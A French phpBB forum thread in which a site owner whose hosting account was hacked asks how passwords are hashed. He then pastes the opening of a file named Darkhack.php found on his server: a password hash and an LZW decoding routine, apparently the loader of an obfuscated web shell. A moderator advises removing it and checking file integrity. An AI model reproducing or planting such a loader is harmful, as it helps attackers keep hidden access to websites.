Cryptage des mots de passe

Pour discuter de phpBB3 - Pas de support sur cette section !
Pour du support veuillez vous rendre sur la section de support

Modérateur : Équipe

Règles du forum
A lire impérativement : Règlement de phpBB-fr.com

Attention, aucun support n'est donné dans cette section.
Répondre
Avatar du membre
Auteur
tof225391
Roi des posts
Roi des posts
Messages : 512
Enregistré le : 19 mai 2007 à 21:47
Localisation : seine et marne
Contact :

Cryptage des mots de passe

Message par tof225391 »

Bonjour,
Récemment, quelqu'un a piraté mon compte Ionos pour commander un serveur.
Je me pose la question s'il a téléchargé la base de données phpbb.

Pourriez vous me dire comment sont encryptés les mots de passe ? MD5 ?
Et est-ce décryptable ? Je me pose ces questions afin de rassurer notre communauté.

Merci beaucoup pour votre aide.

Cordialement
Christophe
Mon site d'Entraide Scolaire : http://myeleec.fr
Avatar du membre
pierredu
Resp. Extensions
Resp. Extensions
Messages : 1496
Enregistré le : 29 mai 2011 à 06:49
Localisation : Paris
Contact :

Cryptage des mots de passe

Message par pierredu »

Bonjour,

Dans la base de phpBB, ce n''est pas le mot de passe qui est stocké, mais le résultat du hachage. Normalement (il y a des matheux qui vérifient ça), les fonctions de hachage sont à sens unique, c'est-à-dire qu'on ne peut pas remonter du résultat vers la source.
Avatar du membre
Auteur
tof225391
Roi des posts
Roi des posts
Messages : 512
Enregistré le : 19 mai 2007 à 21:47
Localisation : seine et marne
Contact :

Cryptage des mots de passe

Message par tof225391 »

Bonjour,

Merci pour votre réponse !

J'ai trouvé un fichier nommé Darkhack.php avec un début de script :

Code : Tout sélectionner

<?php
$PASS="3e58d93ea16245789e2e8654e4d9ac7d";
function Qo($GG) { $OT = 256; $PA = 8; $bh = array(); $LV = 0; $vR = 0; for ($cD = 0; $cD < strlen($GG); $cD++) { $LV = ($LV << 8) + ord($GG[$cD]); $vR += 8; if ($vR >= $PA) { $vR -= $PA; $bh[] = $LV >> $vR; $LV &= (1 << $vR) - 1; $OT++; if ($OT >> $PA) { $PA++; } } } $YX = range("\0", "\xff"); $Qi = ''; foreach ($bh as $cD => $QN) { if (!isset($YX[$QN])) { $aA = $e8 . $e8[0]; } else { $aA = $YX[$QN]; } $Qi .= $aA; if ($cD) { $YX[] = $e8 . $aA[0]; } $e8 = $aA; } return $Qi; } 
Est-ce que cela vous parle ? J'ai changé un peu $pass car je ne sais pas à quoi il correspond.
Mon site d'Entraide Scolaire : http://myeleec.fr
Avatar du membre
pierredu
Resp. Extensions
Resp. Extensions
Messages : 1496
Enregistré le : 29 mai 2011 à 06:49
Localisation : Paris
Contact :

Cryptage des mots de passe

Message par pierredu »

Je ne sais pas. Pour ce qui concerne ma tranquillité, il me suffit de savoir que mon mot de passe n'est pas lisible et qu'il ne peut pas être reconstruit.
Avatar du membre
On Stage
Empereur des posts
Empereur des posts
Messages : 1045
Enregistré le : 19 mars 2018 à 16:04
Localisation : Pays de la Loire
Contact :

Cryptage des mots de passe

Message par On Stage »

Salut
Je ne. saisi pas le but de ta question.
Tu t'es fait pirater ton compte IONOS, cela concerne l'hébergeur et en aucun cas phpBB. En théorie pour accéder à phpMyadmin il faut également un mot de passe, il est d'usage d'en avoir un différent à l'accès au panneau d'administration de l'hébergement.
phpBB version: 3.3.5 | php version: 7.4.25
Quelques traductions d'extensions - GitHub - Arrêter le spam sur phpBB
Skouat
Resp. Traducteurs
Resp. Traducteurs
Messages : 15290
Enregistré le : 02 avr. 2008 à 20:47
Contact :

Cryptage des mots de passe

Message par Skouat »

Bonjour,
tof225391 a écrit :
12 nov. 2021 à 21:49
J'ai trouvé un fichier nommé Darkhack.php avec un début de script :
[…]
Est-ce que cela vous parle ? J'ai changé un peu $pass car je ne sais pas à quoi il correspond.
Trouvé où ? Là où se trouve phpBB ?
Si oui, alors il faut le supprimer et surtout de vérifier l'intégrité des fichiers hébergés sur le serveur.
Répondre

Retourner vers « Discussions sur phpBB3 »

Qui est en ligne

Utilisateurs parcourant ce forum : Aucun utilisateur enregistré et 2 invités